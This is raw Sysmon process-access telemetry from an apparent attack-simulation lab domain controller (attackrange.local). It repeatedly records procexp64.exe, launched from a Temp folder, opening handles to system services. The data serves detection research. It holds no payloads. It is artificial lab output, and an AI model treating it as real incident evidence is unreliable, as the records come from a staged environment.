15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.861{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 